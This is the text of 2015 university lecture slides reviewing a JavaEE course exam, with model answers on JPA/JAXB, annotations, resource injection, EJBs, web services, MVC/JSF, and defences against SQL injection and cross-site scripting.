The end. Carl Nettelblad 2015-06-04

The end Carl Nettelblad 2015-06-04

The exam and end of the course Don t forget the course evaluation! Closing tomorrow, Friday Project upload deadline tonight Book presentation appointments with Kalyan

The exam Correction has started Easy to score some points Hard to nail everything Frequently specific questions posed in the exam text that are simply not answered

Question 1. The Java Architecture for XML Binding (JAXB) and the Java Persistence API (JPA) are two components in JavaEE. They are both used for interacting with other technologies outside of Java. Discuss the similarities between these components, their respective use (including which other JavaEE components rely on them), and how you can maintain a specified contract or schema against a non-java user in the two cases. Also discuss what other components there are in JavaEE for interacting with the same external technologies, and compare them. (6p)

Answer 1 Java Persistence API database tables modelled as Java classes Java Architecture for XML Binding XML elements modelled as Java classes Note the similarity? JAX-WS and JAX-RS rely on JAXB JDBC is another option for database access (slightly more low-level, JPA implementations in fact tend to use JDBC) Expected answer for other XML APIs: DOM, SAX, StAX A lot of you mentioned XSLT, that s relevant, but a bit off the point Both JPA and JAXB support Generate classes from existing schema (database structure or XSD file) Generate schema (SQL statements or XSD file) from annotated classes

Question 2 a) DocumentationConfiguration in JavaEE can frequently be stored in XML files, as well as in annotations. What is an annotation? Why would one choose one over the other in a JavaEE application? (2p) b) We have also used annotations to define injection of specific resources. What is resource injection? Why would one choose to use resource injection over having something like the following in a program? (1p) @Stateless public class DemoEjb implements DemoLocal { private DataSource ds = null; @PostConstruct public void initmethod() { } ctx = new InitialContext(); ds = (DataSource)ctx.lookup("jdbc/fastCoffeeDB"); } //...

Answer 2 Sorry about messup documentation/configuration. Not an obvious effect on most answers Most answers look like you read Configuration A good answer assuming that it really should read Documentation will be respected

Answer 2 Annotations are specific additional meta-data added in a type-safe way to language elements (classes, methods, arguments, variables) Parsed and stored by the compiler Inspected at runtime (here: by the Java container) @ sign A really short description is OK, mentioning @ sign or some example is almost required for full score, unless the theoretical description is very thorough

Where to put configuration? Do you expect it to change? I.e. dependent on specific container/server environment Is it used by many classes? Put in XML! Is it very specifically tied to the workings of the code Put as Java annotations

Resource injection The code example is also an example of using a containermanaged resource Therefore, many answers relating to connection pools, why the container should manage resources etc are correct, but somewhat off the point The core aspect here is what we want to focus on in our code Resource injection is a compact declarative way to request a container-managed resource, allowing the container to manage dependencies. A single line showing the intent. The actual intent of retrieving the resource is less clear in the example code in the exam.

Question 3 In the servlet API, a servlet has to be reentrant. What does this mean, and what are the consequences? In the EJB API, it is stated that the bean classes do not have to be reentrant. How is concurrent access handled instead? Also, in this context, describe the difference between a stateless and a stateful session EJB. (4p)

Reentrant servlets Servlets are reentrant The same instance is used to serve all requests A method can be called to service a new request, on a new thread, while another request is being processed What does this mean? Instance variables and other data are shared, unless you use other means to store them

Non-reentrant EJBs EJBs are not reentrant (Unless you go some length to explicitly ask it to be) Instead, many instances are created These can be shared in pools, but only a single client (object using the EJB) is using a specific instance at any single time Only a single method call going on For stateless EJBs, the ownership by the client starts and ends with every single method call For stateful EJBs, the same instance is locked to a specific client from the time it is retrieved until it goes out of context

Question 4 What is a web service? Web services are designed to be independent of language, technology vendor, and platform. How is this achieved? What is the difference between SOAP-based and RESTful web services? How are web services handled in JavaEE? (4p)

Answer 4 Web services Providing programmatic access to data and services in our application Other code talking to our code over the Internet SOAP General way to send synchronous messages Basically stateless method calls HTTP is one of many transport Typically XML-formatting of messages, rather verbose syntax Multiple services provided in one endpoint (URL)

Answer 4 SOAP Interface of endpoint defined by WSDL REST Using the basic verbs of HTTP The URL represents the request (combined with the request content) Different objects have different URLs Frequently JSON or XML data Just representing the object itself No really general schema definition, self-explaining instead

Answer 4 JAX-WS and JAX-RS are used to interact with and provide web services in JavaEE

Question 5 The model-view-controller paradigm is a common way to design and look at web applications. Using JSP, servlets and (possible Enterprise Java) beans, what is the role of each component in this paradigm? What kind of code/logic would you ideally want to have on each level? How could you use JSF instead?

Answer 5 Model view controller Crucial architectural concept in the course! Model the world and what can happen in the world Implemented as beans Not only containing data, also the actions we can take on data Create objects, modify objects, delete objects in different ways

Answer 5 View Present actual HTML pages to the user In JSP, try to use very little scriptlets, stick to EL and JSTL Present the information stored in the beans served by the controller

Controller Servlet Parsing requests Calling model Populating state from the model into contexts Directing rendering to the correct view Rules of thumb Keep actions that modify data out of views Keep external resource out of controller Keep explicit HTML out of model, ideally out of controller as well

JSF instead JSF is a general modularized framework for multiple HTTP request/response interactions within the same view The controller is managed by the JSF servlet View actions can map directly to bean action methods Control flow also defined by navigation rules

Question 6 a) A web application developer can easily create SQL injection and cross-site scripting problems. Describe what these are and how you can avoid them. Why would the JSTL tag c:out be relevant in this? (2p) b) We talk about programmatic versus declarative security. What do we mean by this, and how can the container help us in maintaining authentication and authorization? Why should the full session, not only the login process, be encrypted - even if the information itself is not sensitive? (4p)

Answer 6 SQL injection adding (unverified) data into a SQL command Can result into data being parsed as SQL code, by data including apostrophes etc Can result in data loss, data being exposed, data being modified, exploits of other parts of the system Avoided by Prepared statements/parametrized queries (or stored procedures, if those are called in a safe manner!) Escaping any dangerous characters or character combinations (not preferable)

Cross-site scripting (XSS) Input from user or another website being run as a script or intepreted as HTML in the context of your web-site Example scenario Result Unvalidated comment form on a news post Arbitrary code/script being run in the context of the users web browser Can access cookie, can redraw the web page to give the impression of the user doing something else than what is really happening Only client-side, but If the exploit affects an admin user, your whole application can be threatened

Cross-site scripting Avoid it by Validating all input Escaping output c:out tag has a default setting of escaping being active, i.e. string <script> would be rendered as <script>script

Declarative security You specify what pages to protect The container maintains specific roles Programmatic and declarative security Even EJB methods can be protected based on such roles Form-based and other methods Programmative security The developer maintains security Checks if the user identity is appropriate for a specific action However, you can ask the container to authenticate programmatically In short: you can use container-based authentication even if you have programmatic authorization

As in many other cases in the course Programmative and declarative security If a declarative approach matches what you want to do, it is probably the safer and more clear way to do it Less things that can go wrong (in your code) Relying more on the code already written and tested by others More clear to a future person who is going to implement changes

All-https Why would we want to encrypt login? To protect user name and password Can be done with hashes over a clear channel (digest-style authentication) Why would we want to stay logged in? The user gets a cookie for identifying the session Every single request contains that cookie Gaining access to the user s account is just a matter of capturing that cookie over an unencrypted session

Project demonstrations If you demonstrate now, no requirement to demonstrate in person later

Your questions? Related to The exam The project Don t forget the course evaluation!